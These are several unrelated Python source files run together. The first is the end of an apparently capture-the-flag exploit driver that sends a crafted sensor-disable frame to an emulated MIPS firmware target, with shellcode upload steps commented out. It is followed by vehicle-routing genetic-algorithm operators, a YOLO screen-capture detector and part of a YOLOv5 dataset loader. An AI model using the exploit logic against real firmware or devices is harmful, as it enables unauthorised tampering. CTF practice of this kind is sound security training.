    message[4:20] = struct.pack("4I", 0xa01805a0, 0xa01805a0, 0xa01805a0, 0xa01805a0)
    total = sum(message[2:60])
    print(len(message))
    total = 0xff - (total & 0xff)
    print(len(message))
    message[63] = total & 0xff   # byte 63, NOT the standard checksum slot 60
    channel.stdin.write(message)
def main():
    """Drive the vmips target: boot the ROM, read the banner, send one frame.

    The commented-out sections are (a) the remote socket/ticket delivery
    path and (b) the shellcode-upload sequence via the two coefficient
    messages; the live code currently exercises only DISABLE_SENSOR
    against a locally spawned vmips instance.
    """
    #if 'CHAL_HOST' in os.environ and 'CHAL_PORT' in os.environ:
    # host = os.environ.get('CHAL_HOST')
    # port = os.environ.get('CHAL_PORT')
    # ticket = os.environ.get('TICKET', "")
    #else:
    # print('[ERROR] CHAL_HOST and CHAL_PORT environment variables are required')
    # exit(-1)
    #Get the host:port from LCM
    # sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # sock.connect((host, int(port)))
    # fsock = sock.makefile('rw')
    # if len(ticket):
    # line = fsock.readline()
    # fsock.write(ticket + '\n')
    # fsock.flush()
    # child = subprocess.Popen(['docker', 'run', '--rm', '-i', '-e','FLAG=flag{12345678901234567890}','mongoose_mayhem:challenge'],0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # Spawn the emulator unbuffered (bufsize=0) so frames reach it immediately.
    child = subprocess.Popen(['./vmips', '-o', 'fpu', '-o', 'memsize=3000000','a.out.rom'], 0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    time.sleep(1)
    #th = threading.Thread(target=receive_output, args=(child,), daemon=False)
    #th.start()
    # Read the 16-byte boot banner before talking to the firmware.
    data = child.stdout.read(16)
    print(data)
    time.sleep(5)
    # # send_test(child)
    send_disable(child)
    # time.sleep(1)
    # # sys.stderr.write("disabling sensor readout\n")
    # # time.sleep(5)
    # sys.stderr.write("sending coefficients1\n")
    # send_coefficients(child, SET_COEFFICIENTS1, shellcode_part1)
    # time.sleep(1)
    # sys.stderr.write("sending coefficients2\n")
    # send_coefficients(child, SET_COEFFICIENTS2, shellcode_part2)
    # time.sleep(1)
    # sys.stderr.write("sending update\n")
    # # send_update(child)
    # send_buffer(child)
    time.sleep(10)
    # # sys.stderr.write("sending two points\n")
# Run the exploit driver when executed directly.
if __name__ == "__main__":
    main()
|
operators.py | import copy
from random import shuffle
from typing import Dict, List, Union
from Ombuki.constants import MUTATION_REVERSAL_LENGTH
from Ombuki.auxiliaries import is_nondominated, mmoeasa_is_nondominated
from Ombuki.ombukiSolution import OmbukiSolution
from MMOEASA.mmoeasaSolution import MMOEASASolution
from threading import Thread, currentThread
from destination import Destination
from problemInstance import ProblemInstance
from vehicle import Vehicle
from common import rand, INT_MAX
def set_up_crossover_child(instance: ProblemInstance, parent_one: Union[OmbukiSolution, MMOEASASolution], parent_two_vehicle: Vehicle) -> OmbukiSolution:
    """Clone parent_one and delete from the clone every customer that
    parent_two_vehicle serves, so that route can be re-inserted by crossover.

    Empty routes left behind by the deletions are removed entirely; loads
    and time windows are recalculated before returning.
    """
    crossover_solution = copy.deepcopy(parent_one)

    # check commentary of "set_up_crossover_child" in "../FIGA/operators.py"
    nodes_to_remove = set([d.node.number for d in parent_two_vehicle.get_customers_visited()])
    i = 0
    while i < len(crossover_solution.vehicles) and nodes_to_remove:
        increment = True
        # j starts at 1: index 0 is the depot, not a customer.
        j = 1
        while j <= crossover_solution.vehicles[i].get_num_of_customers_visited() and nodes_to_remove:
            destination = crossover_solution.vehicles[i].destinations[j]
            if destination.node.number in nodes_to_remove:
                nodes_to_remove.remove(destination.node.number)
                crossover_solution.vehicles[i].current_capacity -= destination.node.demand

                # Deleting the route's last customer would leave an empty
                # route, so drop the whole vehicle instead.
                if crossover_solution.vehicles[i].get_num_of_customers_visited() - 1 > 0:
                    del crossover_solution.vehicles[i].destinations[j]
                else:
                    increment = False
                    del crossover_solution.vehicles[i]
                    break # break, otherwise the while loop will start searching the next vehicle with "j" as the same value; without incrementing "i" and starting "j" at 0
            else:
                j += 1
        if increment:
            i += 1

    crossover_solution.calculate_nodes_time_windows(instance)
    crossover_solution.calculate_vehicles_loads(instance)

    return crossover_solution
def original_crossover_thread(instance: ProblemInstance, solution: Union[OmbukiSolution, MMOEASASolution], parent_vehicle: Vehicle, result: Dict[str, Union[OmbukiSolution, MMOEASASolution]]) -> None:
    """Ombuki's original crossover (one child), run as a thread body.

    Removes parent_vehicle's customers from a copy of `solution`, then
    re-inserts each at the cheapest time-window-feasible position; if none
    exists a brand-new route is created regardless of the fleet-size limit
    (the known weakness of the original operator).
    """
    # check commentary of "crossover" in "../FIGA/operators.py"
    crossover_solution = set_up_crossover_child(instance, solution, parent_vehicle)

    randomized_destinations = list(range(1, len(parent_vehicle.destinations) - 1))
    shuffle(randomized_destinations)
    for d in randomized_destinations:
        parent_destination = parent_vehicle.destinations[d]
        best_vehicle, best_position = INT_MAX, 0
        shortest_from_previous, shortest_to_next = (float(INT_MAX),) * 2
        found_feasible_location = False

        for i, vehicle in enumerate(crossover_solution.vehicles):
            # Skip vehicles that the extra demand would overload.
            if not vehicle.current_capacity + parent_destination.node.demand > instance.capacity_of_vehicles:
                for j in range(1, len(crossover_solution.vehicles[i].destinations)):
                    distance_from_previous = instance.get_distance(vehicle.destinations[j - 1].node.number, parent_destination.node.number)
                    distance_to_next = instance.get_distance(parent_destination.node.number, vehicle.destinations[j].node.number)

                    # Simulate arrival/departure if inserted before position j.
                    simulated_arrival_time = vehicle.destinations[j - 1].departure_time + distance_from_previous
                    if simulated_arrival_time < parent_destination.node.ready_time:
                        simulated_arrival_time = parent_destination.node.ready_time
                    simulated_departure_time = simulated_arrival_time + parent_destination.node.service_duration

                    # BUG FIX: the original condition was "not A and B or C", which
                    # Python parses as "(not A and B) or C", so an insertion point
                    # violating the time windows could still win via C. The
                    # time-window check must gate BOTH distance comparisons.
                    time_windows_ok = not (simulated_arrival_time > parent_destination.node.due_date
                                           or simulated_departure_time + distance_to_next > vehicle.destinations[j].node.due_date)
                    if time_windows_ok and ((distance_from_previous < shortest_from_previous and distance_to_next <= shortest_to_next)
                                            or (distance_from_previous <= shortest_from_previous and distance_to_next < shortest_to_next)):
                        best_vehicle, best_position, shortest_from_previous, shortest_to_next = i, j, distance_from_previous, distance_to_next
                        found_feasible_location = True

        if not found_feasible_location:
            # No feasible spot: open a new route even beyond the fleet limit.
            best_vehicle = len(crossover_solution.vehicles)
            crossover_solution.vehicles.append(Vehicle.create_route(instance, parent_destination.node))
        else:
            crossover_solution.vehicles[best_vehicle].destinations.insert(best_position, copy.deepcopy(parent_destination))

        crossover_solution.vehicles[best_vehicle].calculate_vehicle_load(instance)
        crossover_solution.vehicles[best_vehicle].calculate_destinations_time_windows(instance)
        crossover_solution.vehicles[best_vehicle].calculate_length_of_route(instance)

    crossover_solution.objective_function(instance)
    result[currentThread().getName()] = crossover_solution # since threads cannot return values, the values are assigned to a mutable type instead (a dict in this case)
def modified_crossover_thread(instance: ProblemInstance, solution: Union[OmbukiSolution, MMOEASASolution], parent_vehicle: Vehicle, result: Dict[str, Union[OmbukiSolution, MMOEASASolution]]) -> None:
    """Modified Ombuki crossover (one child), run as a thread body.

    Like original_crossover_thread, but when no feasible insertion exists
    and the fleet is at its size limit, the destination is appended to the
    route whose final customer is nearest, instead of opening a new route.
    """
    # check commentary of "crossover" in "../FIGA/operators.py"
    crossover_solution = set_up_crossover_child(instance, solution, parent_vehicle)

    randomized_destinations = list(range(1, len(parent_vehicle.destinations) - 1))
    shuffle(randomized_destinations)
    for d in randomized_destinations:
        parent_destination = parent_vehicle.destinations[d]
        best_vehicle, best_position = -1, 0
        shortest_from_previous, shortest_to_next = (float(INT_MAX),) * 2
        found_feasible_location = False

        for i, vehicle in enumerate(crossover_solution.vehicles):
            # Skip vehicles that the extra demand would overload.
            if not vehicle.current_capacity + parent_destination.node.demand > instance.capacity_of_vehicles:
                for j in range(1, len(crossover_solution.vehicles[i].destinations)):
                    distance_from_previous = instance.get_distance(vehicle.destinations[j - 1].node.number, parent_destination.node.number)
                    distance_to_next = instance.get_distance(parent_destination.node.number, vehicle.destinations[j].node.number)

                    # Simulate arrival/departure if inserted before position j.
                    simulated_arrival_time = vehicle.destinations[j - 1].departure_time + distance_from_previous
                    if simulated_arrival_time < parent_destination.node.ready_time:
                        simulated_arrival_time = parent_destination.node.ready_time
                    simulated_departure_time = simulated_arrival_time + parent_destination.node.service_duration

                    # BUG FIX: the original condition was "not A and B or C", which
                    # Python parses as "(not A and B) or C", so an insertion point
                    # violating the time windows could still win via C. The
                    # time-window check must gate BOTH distance comparisons.
                    time_windows_ok = not (simulated_arrival_time > parent_destination.node.due_date
                                           or simulated_departure_time + distance_to_next > vehicle.destinations[j].node.due_date)
                    if time_windows_ok and ((distance_from_previous < shortest_from_previous and distance_to_next <= shortest_to_next)
                                            or (distance_from_previous <= shortest_from_previous and distance_to_next < shortest_to_next)):
                        best_vehicle, best_position, shortest_from_previous, shortest_to_next = i, j, distance_from_previous, distance_to_next
                        found_feasible_location = True

        if not found_feasible_location:
            if len(crossover_solution.vehicles) < instance.amount_of_vehicles:
                best_vehicle = len(crossover_solution.vehicles)
                crossover_solution.vehicles.append(Vehicle.create_route(instance, parent_destination.node))
            else:
                # Fleet is full: append to the route whose final customer is
                # nearest to the destination being inserted (time windows ignored).
                sorted_with_index = sorted(crossover_solution.vehicles, key=lambda veh: instance.get_distance(veh.destinations[-2].node.number, parent_destination.node.number))
                for infeasible_vehicle in sorted_with_index:
                    if infeasible_vehicle.current_capacity + parent_destination.node.demand < instance.capacity_of_vehicles:
                        infeasible_vehicle.destinations.insert(infeasible_vehicle.get_num_of_customers_visited() + 1, copy.deepcopy(parent_destination))
                        break
                # NOTE(review): if no vehicle has spare capacity the destination is
                # silently dropped, and best_vehicle stays -1 so the recalculation
                # below touches the LAST vehicle — confirm this is intended.
        else:
            crossover_solution.vehicles[best_vehicle].destinations.insert(best_position, copy.deepcopy(parent_destination))

        crossover_solution.vehicles[best_vehicle].calculate_vehicle_load(instance)
        crossover_solution.vehicles[best_vehicle].calculate_destinations_time_windows(instance)
        crossover_solution.vehicles[best_vehicle].calculate_length_of_route(instance)

    crossover_solution.objective_function(instance)
    result[currentThread().getName()] = crossover_solution # since threads cannot return values, the values are assigned to a mutable type instead (a dict in this case)
def crossover(instance: ProblemInstance, parent_one: Union[OmbukiSolution, MMOEASASolution], parent_two: Union[OmbukiSolution, MMOEASASolution], use_original: bool) -> Union[OmbukiSolution, MMOEASASolution]:
    """Breed two children in parallel threads and return the dominating one.

    Each parent donates one randomly chosen route to the other parent's
    child. `use_original` selects the original operator (may exceed the
    fleet limit) over the modified one (respects the limit).
    """
    # Pick one random donor route from each parent.
    parent_one_vehicle = parent_one.vehicles[rand(0, len(parent_one.vehicles) - 1)]
    parent_two_vehicle = parent_two.vehicles[rand(0, len(parent_two.vehicles) - 1)]

    # threads cannot return values, so they need to be given a mutable type that can be given the values we'd like to return; in this instance, a dict is used and the return values are assigned using the thread names
    # threading is used because Ombuki's crossover creates two child solutions
    thread_results: Dict[str, Union[OmbukiSolution, MMOEASASolution]] = {"child_one": None, "child_two": None}
    child_one_thread = Thread(name="child_one", target=original_crossover_thread if use_original else modified_crossover_thread, args=(instance, parent_one, parent_two_vehicle, thread_results))
    child_two_thread = Thread(name="child_two", target=original_crossover_thread if use_original else modified_crossover_thread, args=(instance, parent_two, parent_one_vehicle, thread_results))
    child_one_thread.start()
    child_two_thread.start()
    child_one_thread.join()
    child_two_thread.join()

    # from the two child solutions, return the dominating one
    # Give both children the same id so the winner slots into parent_one's place.
    thread_results["child_two"].id = thread_results["child_one"].id
    if instance.acceptance_criterion == "MMOEASA":
        return thread_results["child_one"] if mmoeasa_is_nondominated(thread_results["child_one"], thread_results["child_two"]) else thread_results["child_two"]
    return thread_results["child_one"] if is_nondominated(thread_results["child_one"], thread_results["child_two"]) else thread_results["child_two"]
def get_next_vehicles_destinations(solution: Union[OmbukiSolution, MMOEASASolution], vehicle: int, first_destination: int, remaining_destinations: int) -> List[Destination]:
    """Collect `remaining_destinations` customers starting at position
    `first_destination` of the given vehicle, spilling recursively into the
    following vehicle(s) when the current route runs out of customers.
    """
    # Nothing left to collect: recursion bottoms out with an empty list.
    if not remaining_destinations:
        return list()

    num_customers = solution.vehicles[vehicle].get_num_of_customers_visited()
    if num_customers >= first_destination + remaining_destinations:
        # This route alone holds the whole span.
        return solution.vehicles[vehicle].destinations[first_destination:first_destination + remaining_destinations]

    # Take what this route has (customers only; slice end num_customers + 1
    # is exclusive) and fetch the remainder from the next vehicle.
    taken = solution.vehicles[vehicle].destinations[first_destination:num_customers + 1]
    still_needed = remaining_destinations - ((num_customers + 1) - first_destination)
    return taken + get_next_vehicles_destinations(solution, vehicle + 1, 1, still_needed)
def set_next_vehicles_destinations(solution: Union[OmbukiSolution, MMOEASASolution], vehicle: int, first_destination: int, remaining_destinations: int, reversed_destinations: List[Destination]) -> None:
    """Write `reversed_destinations` back over the same span that
    get_next_vehicles_destinations() read, spilling recursively into the
    following vehicle(s); consumes `reversed_destinations` in place.
    """
    # Stop once either the span or the replacement list is exhausted.
    if not (remaining_destinations and reversed_destinations):
        return

    num_customers = solution.vehicles[vehicle].get_num_of_customers_visited()
    if num_customers >= first_destination + remaining_destinations:
        # This route alone holds the whole span: splice and finish.
        solution.vehicles[vehicle].destinations[first_destination:first_destination + remaining_destinations] = reversed_destinations
        reversed_destinations.clear()
        return

    # Fill this route's customers (slice end num_customers + 1 is exclusive,
    # hence the + 1), then continue in the next vehicle with what remains.
    span = (num_customers + 1) - first_destination
    solution.vehicles[vehicle].destinations[first_destination:num_customers + 1] = reversed_destinations[:span]
    del reversed_destinations[:span]
    set_next_vehicles_destinations(solution, vehicle + 1, 1, remaining_destinations - span, reversed_destinations)
def mutation(instance: ProblemInstance, solution: Union[OmbukiSolution, MMOEASASolution]) -> Union[OmbukiSolution, MMOEASASolution]:
    """Reversal mutation: reverse a short random run of customers, treating
    the whole solution as one chromosome so the run may span two vehicles.
    """
    num_nodes_to_swap = rand(2, MUTATION_REVERSAL_LENGTH)
    first_reversal_node = rand(1, (len(instance.nodes) - 1) - num_nodes_to_swap)

    vehicle_num = -1
    num_destinations_tracker = 0
    for i, vehicle in enumerate(solution.vehicles): # because the mutation operator considers the routes as one collective chromosome (list of destinations from 1 to n, excluding starts and ends at the depot), we need to find which vehicle the position "first_reversal_node" belongs to if the solution were a chromosome
        if not num_destinations_tracker + vehicle.get_num_of_customers_visited() > first_reversal_node: # as soon as the sum of destinations is greater than "first_reversal_node", we've arrived at the vehicle where reversal should start
            num_destinations_tracker += vehicle.get_num_of_customers_visited()
        else:
            vehicle_num = i
            break
    first_destination = (first_reversal_node - num_destinations_tracker) + 1 # get the position of the "first_reversal_node" in the vehicle; + 1 to discount the depot at index 0 in the vehicle's destinations

    # the reason that the get and set functions are called recursively is because the mutation operator specified by Ombuki can swap customers across vehicles
    # therefore, the first call of the recursive functions can get/set the first one/two customers from one vehicle, then any remaining customers in the next vehicle
    reversed_destinations = get_next_vehicles_destinations(solution, vehicle_num, first_destination, num_nodes_to_swap)
    reversed_destinations = list(reversed(reversed_destinations))
    set_next_vehicles_destinations(solution, vehicle_num, first_destination, num_nodes_to_swap, reversed_destinations)

    # NOTE(review): only vehicle_num is recalculated below; when the reversal
    # spills into vehicle_num + 1, that vehicle's load/time windows/length are
    # not refreshed here — confirm whether a later full recalculation covers it.
    solution.vehicles[vehicle_num].calculate_vehicle_load(instance)
    solution.vehicles[vehicle_num].calculate_destinations_time_windows(instance)
    solution.vehicles[vehicle_num].calculate_length_of_route(instance)
    solution.objective_function(instance)

    return solution
realtime_detect.py | import colorsys
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '2'
import cv2
import numpy as np
from keras import backend as K
from keras.models import load_model
from keras.layers import Input
from yolo3.model import yolo_eval, yolo_body, tiny_yolo_body
from yolo3.utils import image_preporcess
import multiprocessing
from multiprocessing import Pipe
import mss
import time
# FPS bookkeeping: `fps` counts frames since `start_time`; SHOWMSS_screen
# prints and resets the rate every `display_time` seconds.
# Fix: these three globals were initialized twice in a row; the duplicate
# assignments (identical values) have been removed.
start_time = time.time()
display_time = 2  # displays the frame rate every 2 second
fps = 0

# Screen grabber and the region of the screen to capture.
sct = mss.mss()
monitor = {"top": 40, "left": 0, "width": 1080, "height": 1080}
class YOLO(object):
    """Wraps a trained keras-yolo3 model: loads weights, anchors and class
    names once at construction, then serves per-frame detection through
    detect_image()."""

    # Default configuration; any key may be overridden via YOLO(**kwargs).
    _defaults = {
        #"model_path": 'logs/ep050-loss21.173-val_loss19.575.h5',
        "model_path": 'logs/trained_weights_final.h5',
        "anchors_path": 'model_data/yolo_anchors.txt',
        "classes_path": '4_CLASS_test_classes.txt',
        "score" : 0.3,
        "iou" : 0.45,
        "model_image_size" : (416, 416),
        "text_size" : 3,
    }

    @classmethod
    def get_defaults(cls, n):
        """Return the default value for setting `n`.

        NOTE(review): for an unknown key this returns an error *string*
        instead of raising — callers must check the return value.
        """
        if n in cls._defaults:
            return cls._defaults[n]
        else:
            return "Unrecognized attribute name '" + n + "'"

    def __init__(self, **kwargs):
        """Load the model and build the evaluation graph once."""
        self.__dict__.update(self._defaults) # set up default values
        self.__dict__.update(kwargs) # and update with user overrides
        self.class_names = self._get_class()
        self.anchors = self._get_anchors()
        self.sess = K.get_session()
        # Output tensors are built once here and reused for every frame.
        self.boxes, self.scores, self.classes = self.generate()

    def _get_class(self):
        """Read class names, one per line, from classes_path."""
        classes_path = os.path.expanduser(self.classes_path)
        with open(classes_path) as f:
            class_names = f.readlines()
        class_names = [c.strip() for c in class_names]
        return class_names

    def _get_anchors(self):
        """Read comma-separated anchors from anchors_path as an (N, 2) array."""
        anchors_path = os.path.expanduser(self.anchors_path)
        with open(anchors_path) as f:
            anchors = f.readline()
        anchors = [float(x) for x in anchors.split(',')]
        return np.array(anchors).reshape(-1, 2)

    def generate(self):
        """Load the network (full or tiny), build per-class colors and the
        filtered-box evaluation tensors.

        Returns the (boxes, scores, classes) tensors, which are fed via
        self.input_image_shape at inference time.
        """
        model_path = os.path.expanduser(self.model_path)
        assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'

        # Load model, or construct model and load weights.
        num_anchors = len(self.anchors)
        num_classes = len(self.class_names)
        is_tiny_version = num_anchors==6 # default setting
        try:
            self.yolo_model = load_model(model_path, compile=False)
        except:
            # Weights-only .h5: rebuild the architecture, then load weights.
            self.yolo_model = tiny_yolo_body(Input(shape=(None,None,3)), num_anchors//2, num_classes) \
                if is_tiny_version else yolo_body(Input(shape=(None,None,3)), num_anchors//3, num_classes)
            self.yolo_model.load_weights(self.model_path) # make sure model, anchors and classes match
        else:
            # Full model loaded: sanity-check its head against anchors/classes.
            assert self.yolo_model.layers[-1].output_shape[-1] == \
                num_anchors/len(self.yolo_model.output) * (num_classes + 5), \
                'Mismatch between model and given anchor and class sizes'

        print('{} model, anchors, and classes loaded.'.format(model_path))

        # Generate colors for drawing bounding boxes: evenly spaced hues.
        hsv_tuples = [(x / len(self.class_names), 1., 1.)
                      for x in range(len(self.class_names))]
        self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
        self.colors = list(
            map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
                self.colors))
        np.random.shuffle(self.colors)  # Shuffle colors to decorrelate adjacent classes.

        # Generate output tensor targets for filtered bounding boxes.
        self.input_image_shape = K.placeholder(shape=(2, ))
        boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,
                                           len(self.class_names), self.input_image_shape,
                                           score_threshold=self.score, iou_threshold=self.iou)
        return boxes, scores, classes

    def detect_image(self, image):
        """Run detection on one frame (numpy image, assumed RGB — TODO confirm).

        Draws boxes and labels onto `image` in place and returns
        (annotated_image, ObjectsList), where each ObjectsList entry is
        [top, left, bottom, right, mid_v, mid_h, label, scores].
        """
        if self.model_image_size != (None, None):
            assert self.model_image_size[0]%32 == 0, 'Multiples of 32 required'
            assert self.model_image_size[1]%32 == 0, 'Multiples of 32 required'
            # Letterbox/normalize to the fixed network input size.
            boxed_image = image_preporcess(np.copy(image), tuple(reversed(self.model_image_size)))
            image_data = boxed_image

        out_boxes, out_scores, out_classes = self.sess.run(
            [self.boxes, self.scores, self.classes],
            feed_dict={
                self.yolo_model.input: image_data,
                self.input_image_shape: [image.shape[0], image.shape[1]],#[image.size[1], image.size[0]],
                K.learning_phase(): 0
            })

        #print('Found {} boxes for {}'.format(len(out_boxes), 'img'))

        # Line thickness scales with the frame size.
        thickness = (image.shape[0] + image.shape[1]) // 600
        fontScale=1
        ObjectsList = []

        for i, c in reversed(list(enumerate(out_classes))):
            predicted_class = self.class_names[c]
            box = out_boxes[i]
            score = out_scores[i]

            label = '{} {:.2f}'.format(predicted_class, score)
            #label = '{}'.format(predicted_class)
            scores = '{:.2f}'.format(score)

            # Round the float box and clamp it to the image bounds.
            top, left, bottom, right = box
            top = max(0, np.floor(top + 0.5).astype('int32'))
            left = max(0, np.floor(left + 0.5).astype('int32'))
            bottom = min(image.shape[0], np.floor(bottom + 0.5).astype('int32'))
            right = min(image.shape[1], np.floor(right + 0.5).astype('int32'))

            # Box center coordinates.
            mid_h = (bottom-top)/2+top
            mid_v = (right-left)/2+left

            # put object rectangle
            cv2.rectangle(image, (left, top), (right, bottom), self.colors[c], thickness)

            # get text size
            (test_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, thickness/self.text_size, 1)

            # put text rectangle
            cv2.rectangle(image, (left, top), (left + test_width, top - text_height - baseline), self.colors[c], thickness=cv2.FILLED)

            # put text above rectangle
            cv2.putText(image, label, (left, top-2), cv2.FONT_HERSHEY_SIMPLEX, thickness/self.text_size, (0, 0, 0), 1)

            # add everything to list
            ObjectsList.append([top, left, bottom, right, mid_v, mid_h, label, scores])
        return image, ObjectsList

    def close_session(self):
        """Release the underlying TensorFlow session."""
        self.sess.close()

    def detect_img(self, image):
        """Load an image file from disk and run detect_image() on it."""
        image = cv2.imread(image, cv2.IMREAD_COLOR)
        original_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        # NOTE(review): a second BGR2RGB on an already-converted image swaps the
        # channels back to BGR — confirm whether the double conversion is intended.
        original_image_color = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
        r_image, ObjectsList = self.detect_image(original_image_color)
        return r_image, ObjectsList
def GRABMSS_screen(p_input):
    """Producer process: grab the `monitor` screen region in a tight loop
    and push every raw frame into the pipe for the detection process."""
    while True:
        # Grab one screenshot of the configured region as a numpy array.
        img = np.array(sct.grab(monitor))
        # Hand the frame to the consumer process via the pipe.
        p_input.send(img)
def SHOWMSS_screen(p_output):
    """Consumer process: pull frames from the pipe, run YOLO detection,
    display the annotated frame and print the FPS every `display_time` s."""
    global fps, start_time
    yolo = YOLO()
    while True:
        img = p_output.recv()
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        # NOTE(review): BGR2RGB is applied twice — the second call swaps the
        # channels straight back. Confirm whether one call was intended.
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        r_image, ObjectsList = yolo.detect_image(img)
        cv2.imshow("YOLO v3", r_image)
        if cv2.waitKey(25) & 0xFF == ord("q"):
            cv2.destroyAllWindows()
            return
        # FPS accounting: count frames, report and reset every display_time s.
        fps+=1
        TIME = time.time() - start_time
        if (TIME) >= display_time :
            print("FPS: ", fps / (TIME))
            fps = 0
            start_time = time.time()
        # NOTE(review): a second waitKey 'q' check that breaks (reaching
        # close_session below) — the first one returns without closing; confirm.
        if cv2.waitKey(1) & 0xFF == ord('q'): break
    yolo.close_session()
# Entry point: one process grabs screen frames, the other runs detection.
if __name__=="__main__":
    p_output, p_input = Pipe()
    # creating new processes
    p1 = multiprocessing.Process(target=GRABMSS_screen, args=(p_input,))
    p2 = multiprocessing.Process(target=SHOWMSS_screen, args=(p_output,))
    # starting our processes
    p1.start()
    p2.start()
    # NOTE(review): the parent returns without join()ing p1/p2 — confirm intended.
|
datasets.py | import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
# Reference documentation for the expected dataset layout.
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
# Accepted file extensions (matched case-insensitively against the suffix).
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']

# Get orientation exif tag
# Resolve the numeric EXIF tag id for 'Orientation' once at import time;
# exif_size() uses the resulting module-level `orientation` value.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def exif_size(img):
    """Return the (width, height) of a PIL image, corrected for EXIF rotation.

    Images shot with a 90/270-degree camera rotation report the raw sensor
    size; swap width and height so callers see the displayed orientation.
    Falls back to the raw size when EXIF data is missing or unreadable.

    Fixes: the bare ``except:`` (which also swallowed KeyboardInterrupt/
    SystemExit) is narrowed to ``except Exception``, and the two identical
    rotation branches are merged.
    """
    s = img.size  # (width, height)
    try:
        rotation = dict(img._getexif().items())[orientation]
        if rotation in (6, 8):  # 270 or 90 degrees: displayed axes are swapped
            s = (s[1], s[0])
    except Exception:  # no EXIF data or no orientation tag: keep the raw size
        pass
    return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
    """Build a LoadImagesAndLabels dataset plus a matching DataLoader.

    Returns the tuple (dataloader, dataset).
    """
    dataset = LoadImagesAndLabels(
        path, imgsz, batch_size,
        augment=augment,            # augment images
        hyp=hyp,                    # augmentation hyperparameters
        rect=rect,                  # rectangular training
        cache_images=cache,
        single_cls=opt.single_cls,
        stride=stride,
        pad=pad,
    )

    # never request more samples per batch than the dataset holds
    batch_size = min(batch_size, len(dataset))
    # worker count capped by CPU count, the batch size (0 workers when
    # batch_size <= 1), and a hard limit of 8
    workers = min(os.cpu_count(), batch_size if batch_size > 1 else 0, 8)
    loader = torch.utils.data.DataLoader(
        dataset,
        batch_size=batch_size,
        num_workers=workers,
        pin_memory=True,
        collate_fn=LoadImagesAndLabels.collate_fn,
    )
    return loader, dataset
class LoadImages:  # for inference
    """Iterator over the images and/or videos found at *path* for inference.

    Each iteration yields a tuple
    ``(path, letterboxed 3xHxW RGB array, original BGR image, capture-or-None)``.
    Videos are stepped frame by frame; when one ends, iteration advances to
    the next file automatically.
    """
    def __init__(self, path, img_size=640):
        path = str(Path(path))  # os-agnostic
        files = []
        if os.path.isdir(path):
            files = sorted(glob.glob(os.path.join(path, '*.*')))
        elif os.path.isfile(path):
            files = [path]
        # split the candidate files into images and videos by extension
        images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
        videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
        nI, nV = len(images), len(videos)
        self.img_size = img_size
        self.files = images + videos  # images first, then videos
        self.nF = nI + nV  # number of files
        self.video_flag = [False] * nI + [True] * nV  # True where self.files[i] is a video
        self.mode = 'images'
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
                            (path, img_formats, vid_formats)

    def __iter__(self):
        # reset the cursor so the object can be iterated more than once
        self.count = 0
        return self

    def __next__(self):
        if self.count == self.nF:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read video
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # current video exhausted: release it and move to the next file
                self.count += 1
                self.cap.release()
                if self.count == self.nF:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            print('image %g/%g %s: ' % (self.count, self.nF, path), end='')

        # Padded resize
        img = letterbox(img0, new_shape=self.img_size)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        # cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1])  # save letterbox image
        return path, img, img0, self.cap

    def new_video(self, path):
        # open a new capture and reset the per-video frame counter
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nF  # number of files
class LoadWebcam:  # for inference
    """Iterate frames from a local webcam or an IP/RTSP camera for inference.

    Yields ``('webcam.jpg', letterboxed 3xHxW RGB array, original BGR frame, None)``
    until the user presses 'q'.
    """
    def __init__(self, pipe=0, img_size=640):
        self.img_size = img_size

        if pipe == '0':
            pipe = 0  # local camera
        # pipe = 'rtsp://192.168.1.64/1'  # IP camera
        # pipe = 'rtsp://username:password@192.168.1.64/1'  # IP camera with login
        # pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa'  # IP traffic camera
        # pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg'  # IP golf camera

        # https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
